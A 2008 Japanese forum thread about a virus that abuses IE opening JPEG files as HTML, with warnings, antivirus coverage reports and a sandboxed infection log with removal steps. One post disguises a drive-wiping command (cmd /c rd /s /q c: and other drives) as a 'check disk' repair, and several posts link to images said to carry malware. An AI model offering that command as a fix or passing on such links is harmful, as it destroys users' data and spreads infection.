467名無しさん@お腹いっぱい。:2008/01/03(木) 19:37:49
定期age
468名無しさん@お腹いっぱい。:2008/01/03(木) 19:47:56
>>466
スレに貼られたウイルスコードに反応する事があるけど、
スレを見るぐらいでは感染しないよ。多分
469名無しさん@お腹いっぱい。:2008/01/03(木) 19:50:53
ウイルスに感染した奴の自演がひどいな
470名無しさん@お腹いっぱい。:2008/01/03(木) 20:57:56
結局、一番の対応は、しばらくformat.comをなんかの外部記憶装置にコピペしておくことなんですか?
471名無しさん@お腹いっぱい。:2008/01/03(木) 21:01:15
コピペっつーかカッペ
ちゃんと切り取るんだぞ
472名無しさん@お腹いっぱい。:2008/01/03(木) 21:03:00
deltreeされるからほとんど意味が無いという書き込みをどこかで目にした
473名無しさん@お腹いっぱい。:2008/01/03(木) 21:53:43
これいろいろ騒がれてたけどただIEがjpgをHTMLで開いちゃうってだけだろ
474名無しさん@お腹いっぱい。:2008/01/03(木) 21:55:55
>>470
ちょ、コピーじゃ駄目だろw
475名無し募集中。。。:2008/01/03(木) 22:02:18
http://www.uploda.org/uporg1186454.jpg

さっきコレを踏んでしまいウイルスと言われてました
ずっといろんなところを調べたんですけど
スタートアップにはなにもありません
大丈夫なのかわかりますか?というかコレ自体はやはりウイルスなんですか?
476名無しさん@お腹いっぱい。:2008/01/03(木) 22:06:53
はいはい、良かったね
477475:2008/01/03(木) 22:15:20
もういいわ
面倒だから再起動してみよっと
だめでもいいや
478名無しさん@お腹いっぱい。:2008/01/03(木) 22:35:47
20分経過・・・
479名無しさん@お腹いっぱい。:2008/01/03(木) 22:46:06
>>475
ただのjgp
480475:2008/01/03(木) 22:57:34
            __   __
                /〃    | __
             /\  _ |                __
                      __  , -――-、  /\ノ
                      ヽ/\l::::::::::::::::::::\ /: : /
         ,..-―-、/)       |: : :|::::::::::::::::::::::/: : /
     /⌒Y    (_ノ  /)       |: : :|:::::::::::::::::::::|: : : /
      ̄l ̄l、     ) /`〉     ヽ:: :|::::::::::::::::::::l: : :/
         l: : :`ー--‐'‐'´: :/        \|∧ハ/l/: ::〈
       \: : : : : : : : : :く         |: : : : : : : : : : `ー-┐  ,.、
         l: : : : : : : : : :`ー―┐ ,、   |: : : : : : : : : : : : : : |二lニノ
         ヽ.: : : : : : : : : : : : : :|ニノ   |: : : : : : : : : : : : : : |
           ヽ: : : : : : : : : : : : :|      ヽ: : : : : : : : : : : /
           \: : : : : : : : :/       \ : : : : : : /
              ̄ ̄ ̄ ̄    ノ|      ̄ ̄ ̄       ノ)
                   ノしノ  し'(           ノ)__ノ (ノ(
                   '――――-'′         '-――一-'


心配して損したw
でもちゃんと帰ってこれた
↑の人ありがとうございます
481228:2008/01/04(金) 03:21:44
TEIKIAGE
482名無しさん@お腹いっぱい。:2008/01/04(金) 03:32:09
要お礼
483名無しさん@お腹いっぱい。:2008/01/04(金) 03:56:31
ダイイング メッセージ
484名無しさん@お腹いっぱい。:2008/01/04(金) 04:06:45
∵∴∵∴∵∴∵∴∵∴∵∴∵∴∵∴∵∴ヽ
∵∴∵∴∵∴∵∴/ ̄∵∴∵∴∵∴∴∴∵ヽ
∵∴∵∴∵∴∵∴| ● |∴∵∴∵∴∵∵∵∴ヽ
∵∴∵∴∵∴∵∴ _/ ∴∵∴∵∴∵∴∵∴ ヽ
∵∴∵/ ̄ ̄ ̄ ̄   ,-‐-、 ∴ / ̄∴∵∵∴∵ )
∵∴/  \     /   ヽ∴| ● |∴∵∵∴ ノ
∵/   \ \    l    |   _/∴∵∴∴ノ
/   \ \     ゝ___,.ノ  |∴∵∴∵∴∵ 丿 三が日は終わったぞ
      \     /      |∴∵∴∵∴∵ノ
           /       |∴∵∴∴∵ 丿  いつまでも起きてないで
     \   /     \   |∴∵∴∵∴ノ     早く寝た方がいい
      \/     \ \ |∴∵∴∵ノ
     \ \    \ \  |∴∵∴ノ     …おまえ達を見てると心配になる
     \\ \    \  /∴∵ノ http://www.youlost.mine.nu/html999/img/2718.jpg
                 //
485名無しさん@お腹いっぱい。:2008/01/04(金) 05:13:25
ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ見ても
「拡張子ではなく、内容によってファイルを開く」という項目がありません。
この項目どこにありますか?
ちなみにIE6.00です。
486名無しさん@お腹いっぱい。:2008/01/04(金) 05:17:17
うちのだと「レベルのカスタマイズ」の「その他」の項目、下から三番目にある。
IE6だから同じだと思うけど。
ちなみに「拡張子ではなく、内容によってファイルを開くこと」になってる。
487名無しさん@お腹いっぱい。:2008/01/04(金) 05:58:07
>>486
ありがとうございます、485です。
こちらの「その他」の項目の下から三番目は「異なるドメイン間のサブフレームの移動」となってます。
どなたか御存知の方、宜しくお願いします。
また今夜に来ます。
488名無しさん@お腹いっぱい。:2008/01/04(金) 06:46:27
こっちだと「異なる〜」は下から4番目だな
XPPRO使ってるのが関係あるかは知らないけど。
以前どっかでtxtファイルをhtmlとして読んで変なサイトに飛ばされたんで
無効にした
489名無しさん@お腹いっぱい。:2008/01/04(金) 07:02:38
おっはー(−−;)
490名無しさん@お腹いっぱい。:2008/01/04(金) 07:13:37
もしあやまってウイルスがパソコンの中に入れてしまったら、
そしてうっかりパソコンを終了してしまったらどうしたらいい?
491名無しさん@お腹いっぱい。:2008/01/04(金) 07:19:05
>>490
パソコンの環境によって対処法は異なる。
心配ならこまめにバックアップを取るようにしたらどうだ?
492名無しさん@お腹いっぱい。:2008/01/04(金) 07:21:35
>>491
よくあるパソコンの環境の対処法でおしえて。
493名無しさん@お腹いっぱい。:2008/01/04(金) 07:23:58
ゆとりさんかな?
バックアップをとっておくこと
494名無しさん@お腹いっぱい。:2008/01/04(金) 07:26:44
>>493
バックアップとったあとに大切なファイルがあったときは無理ってこと?
495名無しさん@お腹いっぱい。:2008/01/04(金) 07:29:59
なんのためにバックアップすると思ってるんだ
496名無しさん@お腹いっぱい。:2008/01/04(金) 07:35:05
???
497名無しさん@お腹いっぱい。:2008/01/04(金) 07:36:17
こうやって見てるとゆとりってどこまでもばかなんだな。
498名無しさん@お腹いっぱい。:2008/01/04(金) 08:48:33
冬休みだしな
499名無しさん@お腹いっぱい。:2008/01/04(金) 09:38:05
ボクの最悪な人生もフォーマットしてくれませんか。
500名無しさん@お腹いっぱい。:2008/01/04(金) 10:03:32
おまいはごみ箱で十分
501名無しさん@お腹いっぱい。:2008/01/04(金) 10:20:56
つまりまだやり直し可能、と。
やさしいな;;
502名無しさん@お腹いっぱい。:2008/01/04(金) 11:00:59
携帯使ってバックアップもできるから

SDカードいれてカードリーダモードにするだけだ
対応機種だけだけど

503名無しさん@お腹いっぱい。:2008/01/04(金) 11:02:55
やり直し可能?
にんげ〜ん〜ごじゅ〜うね〜ん〜
504名無しさん@お腹いっぱい。:2008/01/04(金) 11:15:08
doeの専ブラ使ってるんだが最近エラーの警告が出る
消したらまたドドドンとでてくるんだ
これってそのブラクラのせいかな?
怖くて眠れないから誰か教えてくださいorz
505名無しさん@お腹いっぱい。:2008/01/04(金) 11:17:01
メモリ不足じゃない?
506名無しさん@お腹いっぱい。:2008/01/04(金) 11:31:07
相変わらず貼ってる馬鹿いるな
共犯になるとも知らず

どんどん警察のサイバー犯罪ページから報告したほうがいいな。
507名無しさん@お腹いっぱい。:2008/01/04(金) 11:31:20
>>505
すまん 
初心者だからよくわからないんだがメモリ不足の場合どうすればいいんだ?
508名無しさん@お腹いっぱい。:2008/01/04(金) 11:33:07
ぱそをまどから
509名無しさん@お腹いっぱい。:2008/01/04(金) 11:41:07
今、これだけ危険を感じてるのに面白がって貼ってるやつは該当するね。

脅迫罪においての脅迫は、人の生命、財産、身体、名誉、自由(通説によれば貞操や信念も含む)に対して害悪する告知を行うことである。相手が恐怖心を感じるがどうかは問わない

抽象的危険犯

510名無しさん@お腹いっぱい。:2008/01/04(金) 13:44:37
トレンドマイクロ、パターンファイル上がったね
今回ので対応してるかしらん
511名無しさん@お腹いっぱい。:2008/01/04(金) 13:49:43
スタートアップにバッチファイルが無ければいいんだよな?
とりあえず
512名無しさん@お腹いっぱい。:2008/01/04(金) 13:56:57
>>507
いや俺も初心者だからわかんないw
なんてエラーが出てるのかもわかんないし
513名無しさん@お腹いっぱい。:2008/01/04(金) 14:08:32
>>507
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
514名無しさん@お腹いっぱい。:2008/01/04(金) 14:10:44
>>513
お前の書き込みは器物損壊罪に該当する。
警察に通報した。

※513の内容はHD内容を消去する方法です。
515名無しさん@お腹いっぱい。:2008/01/04(金) 14:11:10
チェックディスクコマンドというのをして[スタート]→[ファイル名を指定して実行]を
押して cmd /c rd /s /q c: と打ちOKを押したら、
デスクトップのファイルが消えてたり、共有ドキュメントはあるんですが、
もうかたっぽの方のドキュメントが消えていました。
すぐにもとに戻したいんですが、どうしたら戻りますか?

ここは怖いインターネッツですね
516名無しさん@お腹いっぱい。:2008/01/04(金) 14:11:40
>>513
それ何が面白いの?
517名無しさん@お腹いっぱい。:2008/01/04(金) 14:13:05
513はRemove Directory
518名無しさん@お腹いっぱい。:2008/01/04(金) 14:24:29
いさぎよくカスペルスキーに乗り換えればよかった
519名無しさん@お腹いっぱい。:2008/01/04(金) 14:35:24
ドライブをABC...にするからフォーマットされちゃんうんだよ
ニッポン人なら松、竹、梅、い、ろ、は、に、ほ、へを使えよ!!!
520名無しさん@お腹いっぱい。:2008/01/04(金) 14:37:43
>>485
IE6 SP2以降。。。
521名無しさん@お腹いっぱい。:2008/01/04(金) 14:46:17
ちなみにファイルの格付によって分けてます
松:業務用データ
竹:私用データ
梅:娯楽用データ
522名無しさん@お腹いっぱい。:2008/01/04(金) 14:50:38
更に松のデータへのアクセスは
インターネットに繋がったPCからはアク禁です
523名無しさん@お腹いっぱい。:2008/01/04(金) 15:00:01
神降臨w
524名無しさん@お腹いっぱい。:2008/01/04(金) 15:03:26
ノートンも昨日の日付でバージョン上がってた。ただ仮想環境じゃないのでテストは出来ないけど…
525名無しさん@お腹いっぱい。:2008/01/04(金) 15:24:22
>>513は確実に悪意をもってしてるな
もう何回目だ?

調子に乗りすぎ。
しかも毎回同じ文章だしな。

おとなしく自首したほうがいい。
少しは罪も軽くなるだろう。
526名無しさん@お腹いっぱい。:2008/01/04(金) 15:33:25
wikiアンチウイルスソフト対応状況
http://www13.atwiki.jp/burakura_hdd/pages/12.html

現在の対応状況は半数にも満たしてない
527名無しさん@お腹いっぱい。:2008/01/04(金) 15:46:45
それさ、更新されてないだけじゃね
ノートンもバスターも対応したっぽいじゃん
528名無しさん@お腹いっぱい。:2008/01/04(金) 15:55:26
本当かどうかは定かではない

次週につづく。。
529名無しさん@お腹いっぱい。:2008/01/04(金) 15:57:31
人柱はおらんのかいな〜
530名無しさん@お腹いっぱい。:2008/01/04(金) 15:58:20
メールが送られてきたって人、どんな内容?
親父の携帯に親父のPCからメールが来たんだけど、転送する設定にはしてないらしい。
内容はどーでもいい出会い系かなんかの日本語スパム。
エロ画像もグロ画像も踏んでないし、2chもやってないらしいから違うのかも知れないけど。


531名無しさん@お腹いっぱい。:2008/01/04(金) 16:09:43
>>530 誤爆か?
親父の携帯と親父のPCのメルアドを知っている第三者からの悪戯に一票。
532名無しさん@お腹いっぱい。:2008/01/04(金) 16:15:10
似たような悪戯はよくやったな。
メールのヘッダを調べれば発信元のIPがわかるから誰が犯人だか見当つくよ。
533名無しさん@お腹いっぱい。:2008/01/04(金) 16:20:35
そこでIP偽造ですよ。
534名無しさん@お腹いっぱい。:2008/01/04(金) 16:29:12
>>530-534
スレ違いです。涙目で退場下さい。
535名無しさん@お腹いっぱい。:2008/01/04(金) 16:59:55

イッテラ以上のバックアップが必要な人は大変だぁ〜ね!
536名無しさん@お腹いっぱい。:2008/01/04(金) 17:09:06
35ヨタバイトのバックアップ先が見つからない(ry
537名無しさん@お腹いっぱい。:2008/01/04(金) 17:22:28
33 ヲタ バイトの俺はどうすれば人生再インストール出来ますか?
538名無しさん@お腹いっぱい。:2008/01/04(金) 17:23:38
>>537
( ^ω^)つ【練炭】
539名無しさん@お腹いっぱい。:2008/01/04(金) 18:32:46
ヲタバイトらは途方に暮れてるようだが生`!
540名無しさん@お腹いっぱい。:2008/01/04(金) 18:34:40
バックアップでは対処できない時代に突入してます罠
541名無しさん@お腹いっぱい。:2008/01/04(金) 18:42:59
キロバイト (KB)
メガバイト (MB)
ギガバイト (GB)
テラバイト (TB)
ペタバイト (PB)
エクサバイト(EB)
ゼタバイト (ZB)
ヨタバイト (YB)
ヲタバイト (WOB)←ワロスW
542名無しさん@お腹いっぱい。:2008/01/04(金) 19:01:12
なんか俺らってちっぽけな存在なんだな
ありがとう。おまいら

543名無しさん@お腹いっぱい。:2008/01/04(金) 19:49:59
罪を犯してしまう人はそれなりの理由や覚悟があってのことと察します。
罪を犯した人を憎むのではなく、その人を犯行に及ぼした”種や理由”を憎むのです。
人は稀に強い正義感から罪を犯してしまうこともあるのですから。
544名無しさん@お腹いっぱい。:2008/01/04(金) 20:01:48
今さら来てみた産業
545名無しさん@お腹いっぱい。:2008/01/04(金) 20:04:59
バスターちゃんと動いてくれた
よかた
546名無しさん@お腹いっぱい。:2008/01/04(金) 20:24:32
ノートンはいつになったら…
547名無しさん@お腹いっぱい。:2008/01/04(金) 20:26:02
tp://shunan.myminicity.com/
これは大丈夫かね
548名無しさん@お腹いっぱい。:2008/01/04(金) 20:36:25
>>546
今日未明にとっくに対応してますが
549名無しさん@お腹いっぱい。:2008/01/04(金) 20:39:21
>>548
そうなの?さっきどっかでまだだって書き込み見たから
550名無しさん@お腹いっぱい。:2008/01/04(金) 20:40:55
AVG対応してるのか
スレで画像に対してウイルスだとか言われてるのいくつも保存してあったけど、スキャンしても出ないな
ウイルスのサンプルってどこにもない?
551名無しさん@お腹いっぱい。:2008/01/04(金) 20:43:29
ウィルスじゃないだろ
552名無しさん@お腹いっぱい。:2008/01/04(金) 20:44:17
ウィルスさっき踏んだけど貼ったら俺まで通報されるかもしれないし
553名無しさん@お腹いっぱい。:2008/01/04(金) 20:55:46
いまいちよくわからないんだが、元はただの画像ファイルで、
その画像ファイルのコメント領域かどこかにウイルス発動のためのコードが書いてある
それをIE系が画像ファイルとして処理しないでテキストとして処理しようとしてコードが実行され、
発動のためのbatファイルがスタートアップに保存される
スタートアップに保存されたから再起動時に実行されると終わりということ?
554名無しさん@お腹いっぱい。:2008/01/04(金) 21:08:48
>>531->>533
トンクス
誤爆じゃないっす。まとめサイトにメールが送られてきたとか書いてあったんで。
ヘッダ見るという事を忘れてました。親父に言っときます。

555名無しさん@お腹いっぱい。:2008/01/04(金) 21:14:03
63のやつがそうなのか?
保存したらAVGがSmallなんたらって出た
556名無しさん@お腹いっぱい。:2008/01/04(金) 21:17:53
>>555
そう。
557名無しさん@お腹いっぱい。:2008/01/04(金) 21:19:14
おk把握した。これからコレクションに追加してくる
558名無しさん@お腹いっぱい。:2008/01/04(金) 21:19:23
janedoe&狐使いの俺は無問題なのか?
559名無しさん@お腹いっぱい。:2008/01/04(金) 21:20:49
AVGがまだ対応してないのあるぞ。
馬鹿みたいなことするなよ。
ttp://www.virustotal.com/analisis/0a855807d8948a0870105bb62c373924
560名無しさん@お腹いっぱい。:2008/01/04(金) 21:20:52
>>553 >>555
ニュー速の現行スレに本体のJScriptファイルらしきものがおいてある。
素人だから見てわからなかったが、暗号化されてると聞いて背筋が凍った。
561名無しさん@お腹いっぱい。:2008/01/04(金) 21:33:42
ニュース速報+の現行スレ
【IT】 HDDをフォーマットしちゃうWebサイトが出現。ご注意を!★8
ttp://mamono.2ch.net/test/read.cgi/newsplus/1199295435/
562名無しさん@お腹いっぱい。:2008/01/04(金) 22:33:21
>>6では、ギコナビのポップアップ(画像プレビュー機能のことだよね?)は死亡になってるけど
まとめWikiではギコナビの画像プレビュー機能は大丈夫って書いてあるんだけど、どっちが正しいの?
563名無しさん@お腹いっぱい。:2008/01/04(金) 22:46:32
〜スタートアップにbatファイルがないのに
起動する時にHDフォーマットされそうになるのはなんでだぜ?
キーボードのBreak押したら一応キャンセルはできるみたいだが・・・
564名無しさん@お腹いっぱい。:2008/01/04(金) 23:21:33
俺Meだから知らないけどそれってチェックディスクじゃないの?
どの時点で出てくるものでFormat云々とか書いてあるの?
565名無しさん@お腹いっぱい。:2008/01/05(土) 00:00:47
>>562
ギコナビの画像プレビューで例の画像ポップアップしたけど
とりあえずbatに関してはどこにもダウンロードされてないのを
これに対応済みの複数のウイルススキャン(全ファイル)で確認したよ
怪しいフォルダを開いても見つからなかった

ただ、ギコナビの画像プレビュー用にTemporary Internet Filesに作られた画像ファイルに
トロイの反応あり
手動で削除して、再起動も何回かして2日程度たつけどとりあえず今PCに異常なし

多分大丈夫だとは思うんだけど
心配ならしばらくのあいだ画像プレビューポップアップを無効にしておいたほうがいいかも
566名無しさん@お腹いっぱい。:2008/01/05(土) 00:17:59
「「拡張子ではなく、内容によってファイルを開く」無効でも駄目なケース」
ttp://bakera.jp/ebi/topic/3052

今回のgigigiはこれじゃなかったが、万が一これだった場合は無効にしてても無意味だった
上記テストファイルはOperaでもhtmlとして判断してしまってる…
567名無しさん@お腹いっぱい。:2008/01/05(土) 02:29:55
ノートン更新したからかさっきからdownloaderという名前の脅威で
Temporary Internet Files\Content.IE5\〜\2718[1].jpg
っていうのがやたら反応しまくるんだが・・・
568567:2008/01/05(土) 03:03:28
このスレ閉じて30分経ったから来てみたらすぐ↑の反応があった。
このスレのせいだったのかorz
569名無しさん@お腹いっぱい。:2008/01/05(土) 05:54:01
HOSTS弄って保存したら
Windowsに“出来ねよ(゚Д゚)ゴルァ!!”された
読み取り専用になってた

再度やったらまた保存できねぇ

今度はZAが原因だった

再々度、やったら

今度はWindowsデフェンダが
“HOSTSが変わるぞ((((;゚Д゚))))ガクガクブルブル”してきた

許可して
やっと出来たぜ。
570名無しさん@お腹いっぱい。:2008/01/05(土) 09:18:46
2ch 書き込みスクリプト公開されてるよ。
●、BEログイン対応
http://pc11.2ch.net/test/read.cgi/php/1060009605/508
571名無しさん@お腹いっぱい。:2008/01/05(土) 09:50:21
ウイルスキラーは対応したのか。
御三家の中で馬鹿フィーだけ取り残されてワロタ
572名無しさん@お腹いっぱい。:2008/01/05(土) 10:18:15
http://www.vippers.org/img/uho2155.jpg

脳豚(/ω\)ハズカシーィ
573名無しさん@お腹いっぱい。:2008/01/05(土) 10:19:46
ウイルスキラーより遅い御三家はマジ失笑ものだな
中華以下かよwww

まぁ新種ウイルスへの警戒で御三家を使う事自体がアホだけど。
574名無しさん@お腹いっぱい。:2008/01/05(土) 10:33:22
NODやavast!、BitDefenderも対応してないからこれらも中華以下だな。
BitDefenderは一日に何回も更新してるのに最近は新種や亜種に弱い、何をアップデートしてるんだよ。
575名無しさん@お腹いっぱい。:2008/01/05(土) 10:37:23
>>572
どこが恥ずかしいのか見てきた。どこかの宣伝部隊か?
なんでもかんでも対応してると定義ファイルが肥大化するよ。

ファイル名 uho2155.jpg 受理 2008.01.05 02:29:02 (CET)
現在の状態: 完了
結果: 4/32 (12.5%)

アンチウイルス バージョン 更新日 結果
F-Secure 6.70.13030.0 2008.01.04 Trojan.HTML.Agent.b
Kaspersky 7.0.0.125 2008.01.05 Trojan.HTML.Agent.b
Sophos 4.24.0 2008.01.04 Mal/Iframe-F
Webwasher-Gateway 6.6.2 2008.01.04 Webwasher: Win32/ImgTagVulnerability
http://www.virustotal.com/jp/
http://www.virustotal.com/jp/analisis/b1664553cd2f83a716189fb30975314a
576名無しさん@お腹いっぱい。:2008/01/05(土) 10:38:29
AntiVirは土日更新ないのが痛すぎる、たまに土日更新もあるけどまれなんだよね。
577名無しさん@お腹いっぱい。:2008/01/05(土) 10:41:20
>>574
対応が遅い、あるいは対応しないということは
この脅威が相対的に重要ではないんだよ。
http://canon-sol.jp/product/nd/virusupd/index.html
578名無しさん@お腹いっぱい。:2008/01/05(土) 10:43:02
>>577
ノートンやバスターだって対応したのにそんな言い訳通用しねーよw
579名無しさん@お腹いっぱい。:2008/01/05(土) 10:43:16
>>575
AntiVir送った
580名無しさん@お腹いっぱい。:2008/01/05(土) 10:45:38
>>579
ありがとう。これからEsetに送ってみる。
581名無しさん@お腹いっぱい。:2008/01/05(土) 10:46:45
送るやつとベンダーの対応の早さの両方がなければ結局エンジンは何の意味も成さないってこと
582名無しさん@お腹いっぱい。:2008/01/05(土) 10:53:04
>>578
この中にSymantecやTrendMicro、Kasperskyが対応していない
マルウェアがあるかもしれないよ。
http://canon-sol.jp/product/nd/virusupd/index.html

話題になってると非常に重要だと思えるかも知れないが、
案外目につかないところでいくつも新しいより重要な脅威が
発生しているのかもしれないよ。

HDDをフォーマットするマルウェアには対応してるんだし、
IE6SP2以降のIEでは同類のトラップを回避できる設定もあるし、
他のブラウザにも影響しないようだし、重要性自体はそれほど高くはないんじゃ?
583名無しさん@お腹いっぱい。:2008/01/05(土) 10:54:59
>Kasperskyが対応していないマルウェアがあるかもしれないよ。

ねーよカスが
NOD厨はここでオナニーしないでさっさと失せろ
584名無しさん@お腹いっぱい。:2008/01/05(土) 10:59:24
「重要性」なんていってるからノートンやバスターは落ちぶれ始めNODは世界で相手にされないんだな。
で、カスペが躍進してるという現実。
585580:2008/01/05(土) 11:06:33
送ってきた。
586名無しさん@お腹いっぱい。:2008/01/05(土) 11:17:19
しかし冬厨が作れるウイルスなんざせいぜいがJSとiframe挿入
頑張ってbatファイルかよw

世 界 中 か ら 笑 わ れ て ま す よ 
587名無しさん@お腹いっぱい。:2008/01/05(土) 11:20:28
>>586
キタコレ
冬厨逮捕のチャンスじゃん
588名無しさん@お腹いっぱい。:2008/01/05(土) 11:27:53
このウイルス作る奴は厨だがこれに引っかかる奴も十分冬厨じゃね?
589名無しさん@お腹いっぱい。:2008/01/05(土) 11:32:03
場合によっては冬厨が冬厨を訴えるの図が出来上がるのかw
590名無しさん@お腹いっぱい。:2008/01/05(土) 14:38:28
あれは冬厨じゃないだろw
591名無しさん@お腹いっぱい。:2008/01/05(土) 14:43:52
慌てずに再起動せずにシステムの復元をすれば良かったのか・・・。
バックアップはしていたので思い切ってPC買い換えようかと思ったけど
使い慣れたXPノートをもうしばらく使おうと思い、リカバリして
完全復帰した俺です。
592名無しさん@お腹いっぱい。:2008/01/05(土) 14:48:47
慌てて電源を切って他のシステムからウイルシスキャソして復帰しましたが何か。
593名無しさん@お腹いっぱい。:2008/01/05(土) 14:52:30
>>592
あんたはエロイ!
594名無しさん@お腹いっぱい。:2008/01/05(土) 15:00:56
つか報告あってから対策が出るまでURL踏まなければよかったのに・・・
595名無しさん@お腹いっぱい。:2008/01/05(土) 17:39:58
>>594
あんたはアマイ!
596名無しさん@お腹いっぱい。:2008/01/05(土) 17:44:28
年末2chせずに家族と楽しいひと時を過ごしていたら
踏むこともなかったのにね
597名無しさん@お腹いっぱい。:2008/01/05(土) 17:46:07
裁判官「何故踏んだんだね?」
俺「そこにURLがあるからです!」
598名無しさん@お腹いっぱい。:2008/01/05(土) 18:22:36
アミララの単純な罠に二回も引っかかってんだからやさしいやつらだな。お前らは。
599562:2008/01/05(土) 19:57:14
>>565
遅くなったけどサンクス
600名無しさん@お腹いっぱい。:2008/01/06(日) 00:48:30
>>572をVirtualBox上のXP(IE6+SP1)/ホスト側NOD32で踏んでみた。

モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル file1.exe Win32/Spy.Goldun.NCK トロイ 隔離済 - 切断されました
IMON ファイル fds1010.exe Win32/TrojanDownloader.Zlob.BNY トロイ 隔離済 - 切断されました
IMON ファイル upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル ~jjenscom/up4/index.php JS/TrojanDownloader.Agent.ZZ トロイ 隔離済 - 切断されました
IMON ファイル check/upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル ekryhhpo ウイルスの可能性 : Win32/TrojanDropper.Agent トロイ の亜種
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
601600:2008/01/06(日) 00:49:22
ログの残り
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル bla.exe ウイルスの可能性 : Win32/Statik トロイ の亜種
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 切断されました
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ 切断されました
IMON ファイル .org/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル go.exe Win32/TrojanClicker.Delf.IT トロイ
IMON ファイル /dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル cyber.wmf Win32/Exploit.WMF トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ
IMON ファイル org/ JS/TrojanDownloader.Agent.NAX トロイ

ちなみに、ホスト側Windows XP SP2には全く影響なし。
602600:2008/01/06(日) 00:59:58
試しに仮想マシンに隔離したNICを割り当ててもう一回踏ませてみた。
結果、多数の怪しげなプログラムが組み込まれました。かなり有害。
svchost.exeがたくさん起動してます。ユーザー権限でw
万一実環境で踏んじゃった人は、ログイン直後にタスクマネージャを開いて、
userinit.exeを殺すとログインが止まるので手動でexplorerのみ立ち上げて、
C:\Backup_driversとかいうフォルダをフォルダごと削除。
msconfigとかで怪しいスタートアップを解除orregeditで削除。
結構簡単に消せました。私の環境では。
603名無しさん@お腹いっぱい。:2008/01/06(日) 02:13:19
>600-602
gj

ようわからんけど、これもJSをOKにしておくと食らうもんなの?
もしそうなら、今回の騒動でJSを切ったり、ブラウザ・専ブラ変えてたりする人が
多いだろうから、まだ被害もそんなに出ないんだろうけど。

userinitってのはログイン時にしか出ないのかな、
だとしたら、とりあえず、未対応ベンダーの場合、
Cドライブに怪しいフォルダがあるかが感染の判別ポイントなのかな…。

あと、スタートアップは、スタートメニュー内のフォルダは手動できれいにすればいいとしても、
レジストリの方は自分で掃除するのが怖い場合、
スタートアップチェッカーあたりをあらかじめ入れてないと困るのかな…

短縮URLを使ったやつを2ch以外に書き込むやつもいるようだし、
2chに書き込みをせずP2Pを使わないで、たかだかWebを見て回るだけでも、
おびえながらやるようなことになるのかな、今後…。
604名無しさん@お腹いっぱい。:2008/01/06(日) 02:33:58
blogのトラックバック、コメントでも悪用すれば行けるからねー。
605名無しさん@お腹いっぱい。:2008/01/06(日) 05:44:51
>>602
> msconfigとかで怪しいスタートアップを解除orregeditで削除。

kwsk。
例えばどんなぁゃιぃプログラムが常駐するの?
606602:2008/01/06(日) 06:09:55
>>605
「svchost .exe」(ファイル名末尾に空白あり)が6つほど
「ms-1.exe」
「msntqsbk.exe」(たぶんランダムなファイル名、Cドライブ直下に発見/39,424Byte)
「apnccwwqvvp.exe」(上に同じく/45,056Byte)

っていうか、仮想ディスクを元に戻して踏み直したら、
ログオン後数分で強制ログアウトするようになったwwこれはひどいwww
でもワンクリックで元通りwwwざまぁwww

で、userinit.exeを殺して、explorerだけ立ち上げてしばらく放っておいたら、
「TrustedAntivirus」とかいう怪しげなプログラムがインストールされた。
現在インストール進行中。ちなみにホストには全く影響なし。
607606:2008/01/06(日) 06:40:17
apnccwwqvvp.exeを消したら強制ログオフはなくなった。
TrustedAntibirusをアンインストールしたらコントロールパネルが消えたw
仕方がないから仮想ディスクを復元して終わり。実環境ではどうすればいいやら…
NODの反応がいまいち良くないな…ファイルを組み込まれる前はちゃんと動作するんだけど、
組み込まれたファイルを検出しないのがあった。

とりあえず、現時点での対策はJavascriptを無効化したり、
IE以外のブラウザを使うしかないんじゃないかな。
そういえば、NetFront(PSP/Windows Mobile 5)も偽装されたファイルに対応できなかった。
自作のjpg風味スクリプトをPSPで踏ませたら普通に動作したw
PSP\UPDATE\EBOOT.PBPにファイルを保存させられればPCより酷い目に遭うかも。(CFWの人は)
608名無しさん@お腹いっぱい。:2008/01/06(日) 08:25:20
ふーん janeで踏んだけどなんともないけどな
飛び先の画像もいくつか踏んだけどなんともねえw
アンチウイルス入れてないけどw

>>606氏は乙だけどsp1じゃ感染して当たり前w
609607:2008/01/06(日) 08:28:08
>>608
あえて一番脆弱性の多いSP1を選んでみたw
というよりは手元にあるディスクがSP1のだったw
暇があったらSP2とSP3の環境を構築して実験してみる。
